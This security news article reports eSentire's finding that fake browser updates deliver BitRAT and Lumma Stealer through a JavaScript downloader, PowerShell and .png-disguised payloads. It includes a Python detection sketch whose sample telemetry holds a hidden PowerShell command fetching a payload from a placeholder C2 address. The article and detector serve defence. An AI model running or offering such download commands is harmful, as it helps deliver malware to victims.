Malware Alert: BitRAT and Lumma Stealer Disguised in Fake Browser Updates

Threat actors are leveraging fake browser updates to deploy BitRAT and Lumma Stealer. eSentire’s Threat Response Unit (TRU) has traced the infection chain and offers actionable guidance for mitigating the risks posed by these threats.

June 4, 2024

  • Fake browser updates are being exploited as a delivery mechanism for BitRAT and Lumma Stealer malware, which eSentire’s Threat Response Unit (TRU) detected in May 2024.
  • The malware payloads, hidden within JavaScript code and disguised as .png files, are deployed through PowerShell scripts, highlighting the need for heightened user awareness and robust endpoint protection measures.

Fake browser updates have emerged as a prevalent method for delivering malware, as highlighted in a recent finding by eSentire’s Threat Response Unit (TRU). In May 2024, TRU uncovered instances of fake updates distributing BitRAT and Lumma Stealer, both notorious for their data-stealing capabilities.

The attack typically begins when a user visits a compromised webpage containing malicious JavaScript code. This code redirects the user to a fraudulent update page that urges them to download a Zip archive named ‘Update.zip’ from Discord’s Content Distribution Network (CDN). Inside this archive is a JavaScript file (Update.js) that serves as the initial downloader, fetching the payloads when executed.
Executing Update.js launches multiple PowerShell scripts hosted on a known BitRAT Command-and-Control (C2) address. These scripts download and execute subsequent payloads disguised as .png files, which handle loading, persistence, and delivery of the final payload.
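As an added illustration (not code from the eSentire report), the following Python sketch flags the chain described above in constructed process-creation telemetry: a script host running a .js file that spawns PowerShell fetching a .png-named URL, plus a check that a .png-named file actually carries the PNG signature. The event fields, file paths and the 203.0.113.5 address are constructed, not indicators from the report.

```python
"""Detect the fake-browser-update chain (JS downloader -> PowerShell -> .png payload)."""
import re
from dataclasses import dataclass

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"  # real PNG files start with this signature
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
PNG_URL_RE = re.compile(r"https?://\S+?\.png\b", re.IGNORECASE)


@dataclass
class ProcessEvent:
    pid: int
    parent_pid: int
    image: str      # full path of the executable
    cmdline: str    # command line as logged


# Constructed sample telemetry; 203.0.113.5 is a TEST-NET placeholder, not the real C2.
SAMPLE_EVENTS = [
    ProcessEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcessEvent(200, 100, r"C:\Windows\System32\wscript.exe",
                 r'wscript.exe "C:\Users\u\Downloads\Update\Update.js"'),
    ProcessEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell.exe -w hidden -c "iwr http://203.0.113.5/loader.png -OutFile a.png"'),
    # Benign admin script: same parent type, but no .png download -> must not alert
    ProcessEvent(400, 100, r"C:\Windows\System32\wscript.exe", r'wscript.exe "C:\Tools\cleanup.js"'),
    ProcessEvent(500, 400, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -File C:\Tools\rotate_logs.ps1"),
]


def find_suspicious_chains(events):
    """Return (script_pid, powershell_pid, url) for each PowerShell process whose
    parent is a script host running a .js file and whose command line fetches a .png URL."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if not e.image.lower().endswith("powershell.exe"):
            continue
        parent = by_pid.get(e.parent_pid)
        if parent is None or parent.image.lower().rsplit("\\", 1)[-1] not in SCRIPT_HOSTS:
            continue
        if ".js" not in parent.cmdline.lower():
            continue
        for url in PNG_URL_RE.findall(e.cmdline):
            hits.append((parent.pid, e.pid, url))
    return hits


def is_fake_png(data: bytes) -> bool:
    """True when bytes saved under a .png name do not carry the PNG signature."""
    return not data.startswith(PNG_MAGIC)


if __name__ == "__main__":
    for hit in find_suspicious_chains(SAMPLE_EVENTS):
        print("suspicious chain (script pid, powershell pid, url):", hit)
```

The magic-byte check is the second signal: a downloaded ".png" that starts with an MZ header or script text rather than the PNG signature is the disguise the report describes.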

One such payload, BitRAT, offers a wide range of features, including remote desktop access and cryptocurrency mining. Lumma Stealer, the other detected payload, specializes in stealing sensitive data such as cryptocurrency wallets and browser extension data, and is sold as Malware-as-a-Service.

The utilization of fake updates as a delivery conduit underscores the necessity for user vigilance regarding the legitimacy of update prompts. Implementing robust endpoint protection tools and conducting security awareness training programs can mitigate such threats effectively.
Arshiya Kunwar
Arshiya Kunwar is an experienced tech writer with 8 years of experience. She specializes in demystifying emerging technologies like AI, cloud computing, data, digital transformation, and more. Her knack for making complex topics accessible has made her a go-to source for tech enthusiasts worldwide. With a passion for unraveling the latest tech trends and a talent for clear, concise communication, she brings a unique blend of expertise and accessibility to every piece she creates. Arshiya’s dedication to keeping her finger on the pulse of innovation ensures that her readers are always one step ahead in the constantly shifting technological landscape.